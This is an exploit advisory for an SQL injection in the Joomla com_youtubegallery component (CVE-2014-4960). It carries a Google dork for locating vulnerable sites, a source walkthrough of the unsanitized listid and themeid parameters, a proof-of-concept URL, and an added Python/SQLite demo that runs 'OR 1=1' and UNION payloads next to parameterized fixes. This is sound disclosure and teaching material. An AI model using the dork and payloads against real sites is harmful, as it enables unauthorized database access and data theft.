# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x (3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960
Detail:
At line 40 of components\com_youtubegallery\models\gallery.php the branch is entered whenever JRequest::getInt('listid') is non-zero. getInt() applies PHP's (int) cast, so any string with a leading non-zero integer (for example "1' ..." or "2 OR 1=1") satisfies the check. Inside the branch, however, $listid is re-read with JRequest::getVar('listid'), which returns the raw request string, and $themeid is read with JRequest::getVar('themeid') without any cast. Neither value is sanitized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:     //Shadow Box
43:     $listid=JRequest::getVar('listid');
44:
45:
46:     //Get Theme
47:     $m_themeid=(int)JRequest::getVar('mobilethemeid');
48:     if($m_themeid!=0)
49:     {
50:         if(YouTubeGalleryMisc::check_user_agent('mobile'))
51:             $themeid=$m_themeid;
52:         else
53:             $themeid=JRequest::getVar('themeid');
54:     }
55:     else
56:         $themeid=JRequest::getVar('themeid');
57: }
Afterwards $listid and $themeid are passed, still unsanitized, to getVideoListTableRow() at line 86 and getThemeTableRow() at line 92. Both methods build their SQL by string concatenation, so both parameters are injectable. Note the two constraints visible in the code above: a listid payload must start with a non-zero integer so that getInt() returns true at line 40, and themeid reaches the query raw except on the mobile path (line 51), where the integer-cast $m_themeid is used instead.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88:     echo '<p>No video found</p>';
89:     return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94:     echo '<p>No video found</p>';
95:     return false;
96: }

# Site PoC: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
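The following is an added example, not code from the advisory or from the com_youtubegallery component. It re-creates the gallery.php pattern in Python against an in-memory SQLite database so the two injection points can be exercised end to end: php_intval() mimics the PHP (int) cast behind JRequest::getInt(), the "vulnerable_" functions concatenate the raw value exactly as the advisory describes, and the "fixed_" functions show the cast-then-bind alternative. The table and column names (videolists, themes, published) are assumptions for the demonstration, not the component's real schema.

```python
import re
import sqlite3

# Constructed sample schema for the demo; not the component's real tables.
SCHEMA = """
CREATE TABLE videolists (id INTEGER PRIMARY KEY, name TEXT, published INTEGER);
INSERT INTO videolists VALUES (1, 'public list', 1), (2, 'hidden list', 0);
CREATE TABLE themes (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO themes VALUES (1, 'default theme');
"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def php_intval(value):
    """Mimic PHP's (int) cast / JRequest::getInt(): leading integer prefix, else 0."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group(0)) if m else 0


def run_sql(conn, sql, args=()):
    """Return ("ok", rows) or ("error", message) so callers can inspect both outcomes."""
    try:
        return ("ok", conn.execute(sql, args).fetchall())
    except sqlite3.Error as e:
        return ("error", str(e))


def vulnerable_video_list(conn, params):
    """Lines 40/43 pattern: getInt() gates the branch, getVar() feeds the query."""
    raw = params.get("listid", "")
    if not php_intval(raw):          # JRequest::getInt('listid'): true for "2 OR 1=1--"
        return ("ok", [])
    listid = raw                     # JRequest::getVar('listid'): the raw request string
    return run_sql(conn, "SELECT id, name FROM videolists WHERE id=" + listid + " AND published=1")


def vulnerable_theme(conn, params):
    """Lines 53/56 pattern: themeid is never cast before concatenation."""
    themeid = params.get("themeid", "")
    return run_sql(conn, "SELECT id, name FROM themes WHERE id=" + themeid)


def fixed_video_list(conn, params):
    """Cast once, then bind the integer; the raw string never touches the query."""
    listid = php_intval(params.get("listid", ""))
    if not listid:
        return ("ok", [])
    return run_sql(conn, "SELECT id, name FROM videolists WHERE id=? AND published=1", (listid,))


def fixed_theme(conn, params):
    themeid = php_intval(params.get("themeid", ""))
    return run_sql(conn, "SELECT id, name FROM themes WHERE id=?", (themeid,))


if __name__ == "__main__":
    db = build_db()
    # listid passes the getInt() gate (prefix 2) and the tail rewrites the WHERE clause,
    # leaking the unpublished list.
    print(vulnerable_video_list(db, {"listid": "2 OR 1=1--"}))
    # The advisory's PoC value: a stray quote produces an SQL syntax error.
    print(vulnerable_theme(db, {"themeid": "1'"}))
    # themeid has no gate at all, so a UNION pulls rows from another table.
    print(vulnerable_theme(db, {"themeid": "0 UNION SELECT id, name FROM videolists"}))
    # Hardened versions: the same payloads collapse to the integer prefix.
    print(fixed_video_list(db, {"listid": "2 OR 1=1--"}))
    print(fixed_theme(db, {"themeid": "1'"}))
```

The gate at line 40 is what makes the listid payload shape matter: "abc" never reaches the query because (int)"abc" is 0, but anything beginning with a non-zero digit does. The themeid parameter has no such gate, which is why the advisory's PoC only needs a single quote to trigger an error.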